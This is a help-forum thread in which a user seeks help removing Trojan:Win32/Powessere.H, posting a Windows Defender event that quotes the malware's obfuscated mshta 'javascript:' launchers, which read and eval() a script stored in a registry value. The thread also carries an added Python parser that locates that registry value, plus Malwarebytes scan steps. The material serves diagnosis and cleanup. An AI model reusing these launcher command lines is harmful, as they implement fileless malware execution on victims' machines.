Persistent Trojan:Win32/Powessere.H

CainPDX

New Member
Thread author
Mar 4, 2018
3
Event Viewer gave this information on Event 1116 which is one of many similar events that occur each time I turn on my computer:
Windows Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
Trojan:Win32/Powessere.H threat description - Windows Defender Security Intelligence
Name: Trojan:Win32/Powessere.H
ID: 2147726088
Severity: Severe
Category: Trojan
Path: CmdLine:_\Device\HarddiskVolume3\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C start "" mshta.exe "javascript:np8si="wPk";U5s=new ActiveXObject("WScript.Shell");DY3YUb4="cf0QT2cs";ht9kH1=U5s.RegRead("HKCU\\software\\eewn\\jmvryxenjm");B9OL8lS="v3R7";eval(ht9kH1);yod1qRHe="najkzw5";";CmdLine:_\Device\HarddiskVolume3\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C start "" mshta.exe "javascript:p1ytp3UQ="OsEleDvM";T9w9=new ActiveXObject("WScript.Shell");jqZ5p="z85p";O1w2wW=T9w9.RegRead("HKCU\\software\\eewn\\jmvryxenjm");W0kFQ0aRP="Moquky";eval(O1w2wW);yevFGLg7="TNvL";";CmdLine:_\Device\HarddiskVolume3\Windows\System32\mshta.exe "mshta.exe" "javascript:HIYtYH1X="BbcyJUP";rs47=new ActiveXObject("WScript.Shell");iM5UN9Ac="X";mYgT0=rs47.RegRead("HKCU\\software\\eewn\\jmvryxenjm");S1Slz="ZtF9r";eval(mYgT0);RuWi9="jbZ8qk";"
Detection Origin: Unknown
Detection Type: Concrete
Detection Source: System
User: NT AUTHORITY\SYSTEM
Process Name: Unknown
Signature Version: AV: 1.263.119.0, AS: 1.263.119.0, NIS: 118.2.0.0
Engine Version: AM: 1.1.14600.4, NIS: 2.1.14202.0
 

Attachments

  • FRST.txt
    85 KB · Views: 4
  • Addition.txt
    42.2 KB · Views: 5
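Added example (not part of the original posts and not a tool used in this thread): a small Python parser for the `Path` field of a Defender event 1116 like the one above, which lists the registry value that each `mshta.exe "javascript:..."` launcher reads and passes to `eval()`, so a responder knows where the stored script lives. The function names are hypothetical, and the sample input is constructed to match the shape of the event (variable names shortened, registry key as reported in the event).

```python
import re

# Constructed sample shaped like the Path field of the event above (variable names shortened).
SAMPLE_PATH = (
    r'CmdLine:_\Device\HarddiskVolume3\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" '
    r'/C start "" mshta.exe "javascript:a="x";s=new ActiveXObject("WScript.Shell");'
    r'k=s.RegRead("HKCU\\software\\eewn\\jmvryxenjm");eval(k);b="y";";'
    r'CmdLine:_\Device\HarddiskVolume3\Windows\System32\mshta.exe "mshta.exe" '
    r'"javascript:c="z";t=new ActiveXObject("WScript.Shell");'
    r'm=t.RegRead("HKCU\\software\\eewn\\jmvryxenjm");eval(m);d="w";"'
)

# <var> = <shell>.RegRead("<registry path>")
REGREAD = re.compile(r'(\w+)\s*=\s*\w+\.RegRead\("([^"]+)"\)', re.I)

def split_entries(path_field):
    """Defender joins several resources in one Path field; split on the CmdLine:_ prefix."""
    parts = re.split(r'(?=CmdLine:_)', path_field)
    return [p.rstrip(';') for p in parts if p.startswith('CmdLine:_')]

def analyze_entry(entry):
    """Return findings for one command line, or None if it is not an mshta javascript: launcher."""
    if not re.search(r'mshta(\.exe)?"?\s+"javascript:', entry, re.I):
        return None
    findings = []
    for var, key in REGREAD.findall(entry):
        key = key.replace('\\\\', '\\')  # undo JavaScript string escaping
        # RegRead treats the last path component as a value name unless the path ends in "\"
        hive_path, _, value_name = key.rpartition('\\')
        evaluated = re.search(r'eval\(\s*' + re.escape(var) + r'\s*\)', entry) is not None
        findings.append({'key': hive_path, 'value': value_name, 'evaluated': evaluated})
    return findings

def registry_locations(path_field):
    """Unique (key, value) pairs whose contents are read and then passed to eval()."""
    seen = []
    for entry in split_entries(path_field):
        for f in analyze_entry(entry) or []:
            loc = (f['key'], f['value'])
            if f['evaluated'] and loc not in seen:
                seen.append(loc)
    return seen

if __name__ == '__main__':
    for key, value in registry_locations(SAMPLE_PATH):
        print(f'script payload stored in {key} value {value}')
```

The reported location is the data the launcher executes; whatever starts the launcher at boot (the events recur at every startup) is a separate persistence entry that still has to be found and removed.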

CainPDX

New Member
Thread author
Mar 4, 2018
3
And by the way, thanks a lot for providing this kind of help for home computer kibitzers like myself. You're GREAT!
 

TwinHeadedEagle

Level 41
Verified
Mar 8, 2013
22,627
Hello,


Scan with Malwarebytes' Anti-Malware

Please download Malwarebytes Anti-Malware and save it to your desktop.
  • Install the program.
  • Click the Scan tab, make sure Threat Scan is checked, and click Start Scan.
  • If threats are detected, click the Quarantine Selected button. You will now be prompted to reboot. Click Yes.
  • Upon completion of the scan (or after the reboot), click the Reports tab.
  • Double-click the Scan Log.
  • At the bottom click Export and choose Text file.
Save the file to your desktop and include its content in your next reply.
 

CainPDX

New Member
Thread author
Mar 4, 2018
3
I appreciate your suggestions. I downloaded and ran the Malwarebytes scan. There were 614 problem files including several rootkit programs. I've attached the log file. Is there anything else I need to do?
 

Attachments

  • MWB Scan log 3-9-18.txt
    113.9 KB · Views: 7
